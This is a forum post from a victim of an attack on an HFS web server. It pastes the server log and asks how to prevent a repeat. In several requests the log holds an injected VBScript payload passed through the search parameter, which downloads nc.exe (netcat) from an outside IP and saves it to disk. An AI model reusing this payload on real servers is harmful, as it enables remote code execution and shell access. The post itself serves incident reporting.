Hello all!
Today my antivirus told me, that trojan was deleted. It was a vbs-script, i've opened it in N++ and here it is on screenshot.
After that i've started try to found, how it happened. And i found it. HFS working on 80 port, and every day i have a lot of messages of "requested GET" and "trying to upload xml". I've opened HFS and saw it (look screenshot).
I've exported full log to txt file and here it is:
9:24:21 150.70.188.172:53306 Requested GET /
9:31:24 150.70.173.52:45675 Requested GET /
10:33:11 150.70.188.182:45937 Requested GET /
12:42:17 127.0.0.1:58565 Upload failed, Folder not found: getstring.xml
13:10:33 150.70.188.178:57561 Requested GET /
15:19:09 150.70.188.178:52023 Requested GET /
15:36:46 150.70.173.43:58891 Requested GET /
17:06:33 150.70.173.7:48701 Requested GET /
18:37:18 150.70.188.181:50506 Requested GET /
19:07:36 150.70.173.57:57074 Requested GET /
20:01:32 188.138.1.218:42693 Requested GET /
21:58:16 188.32.198.69:17087 Requested GET /
14:03:59 127.0.0.1:64139 Upload failed, Folder not found: getstring.xml
21:34:42 150.70.173.10:54565 Requested GET /
23:49:04 150.70.188.172:57408 Requested GET /
0:05:27 150.70.173.8:56183 Requested GET /
0:35:08 150.70.188.169:41555 Requested GET /
3:21:10 150.70.188.166:44530 Requested GET /
4:36:26 150.70.97.86:48072 Requested GET /
6:51:26 150.70.173.49:34699 Requested GET /
7:13:12 185.130.5.146:41838 Requested HEAD /
7:27:38 94.102.49.78:32822 Requested GET /
10:14:02 95.220.12.221:56833 Requested GET /
10:14:02 95.220.12.221:56841 Requested GET /
11:36:21 150.70.188.182:36670 Requested GET /
11:50:43 150.70.173.55:57792 Requested GET /
12:54:18 150.70.188.179:46689 Requested GET /
13:59:29 150.70.173.44:58075 Requested GET /
14:04:32 127.0.0.1:61309 Upload failed, Folder not found: getstring.xml
23:53:11 150.70.188.180:38578 Requested GET /
2:39:02 162.13.170.123:60331 Requested GET /
14:05:32 127.0.0.1:58712 Upload failed, Folder not found: getstring.xml
14:14:29 193.124.183.62:59434 Requested GET /
18:38:16 150.70.188.165:52615 Requested GET /
0:53:07 150.70.188.180:38067 Requested GET /
3:02:21 150.70.173.41:58793 Requested GET /
4:21:49 37.153.173.10:57460 Requested GET /
5:25:08 185.129.62.62:55354 Requested GET /
5:45:42 185.65.135.227:54500 Requested GET /
6:58:03 171.25.193.131:22518 Requested GET /
9:45:22 150.70.173.5:41667 Requested GET /
11:56:00 193.124.183.62:50858 Requested GET /
12:24:58 185.130.5.146:47664 Requested HEAD /
14:06:30 127.0.0.1:51959 Upload failed, Folder not found: getstring.xml
16:53:28 163.172.13.21:63567 Requested GET /
17:53:59 66.240.192.138:51136 Requested GET /
18:17:14 150.70.188.171:37191 Requested GET /
21:19:42 159.224.52.241:57673 Requested GET /
22:04:44 150.70.173.40:58734 Requested GET /
23:13:02 193.124.183.62:62283 Requested GET /
0:27:39 162.13.170.123:56872 Requested GET /
4:04:43 188.32.105.181:65077 Requested GET /
4:09:21 150.70.173.58:34591 Requested GET /
5:16:26 77.247.181.162:46931 Requested GET /
7:49:13 51.254.44.137:41738 Requested GET /
9:49:22 150.70.188.178:55827 Requested GET /
10:38:10 193.124.183.62:61670 Requested GET /
14:07:31 127.0.0.1:54231 Upload failed, Folder not found: getstring.xml
15:42:55 185.130.5.146:39691 Requested HEAD /
17:24:32 137.226.113.7:44838 Requested GET /
19:15:21 193.124.183.62:55358 Requested GET /
1:46:28 188.138.1.218:59867 Requested GET /
3:10:43 62.210.162.182:41469 Requested GET /
3:10:45 62.210.162.182:48773 Requested GET /
4:50:19 176.10.99.206:60831 Requested GET /
5:05:30 112.115.19.84:60662 Requested GET /
5:06:00 112.115.19.84:60676 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
> .type = 1 '//binary
> .open
> .write xHttp.responseBody
> .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:06:03 112.115.19.84:60677 Requested GET /?search=5:06:04 112.115.19.84:60678 Requested GET /?search=5:06:10 112.115.19.84:60679 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
> .type = 1 '//binary
> .open
> .write xHttp.responseBody
> .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:06:13 112.115.19.84:60680 Requested GET /?search=5:06:14 112.115.19.84:60681 Requested GET /?search=5:17:19 112.115.19.84:60818 Requested GET /
5:17:46 112.115.19.84:60839 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
> .type = 1 '//binary
> .open
> .write xHttp.responseBody
> .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:17:49 112.115.19.84:60840 Requested GET /?search=5:17:49 112.115.19.84:60841 Requested GET /?search=5:17:58 112.115.19.84:60842 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
> .type = 1 '//binary
> .open
> .write xHttp.responseBody
> .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:18:00 112.115.19.84:60843 Requested GET /?search=5:18:01 112.115.19.84:60844 Requested GET /?search=5:32:09 150.70.188.181:42913 Requested GET /
5:58:29 150.70.188.181:42625 Requested GET /
So, what should i do, to prevent same situations? Now i switched off HFS+, but i really need it. Let me know, how to prevent illegal actions. Thanks!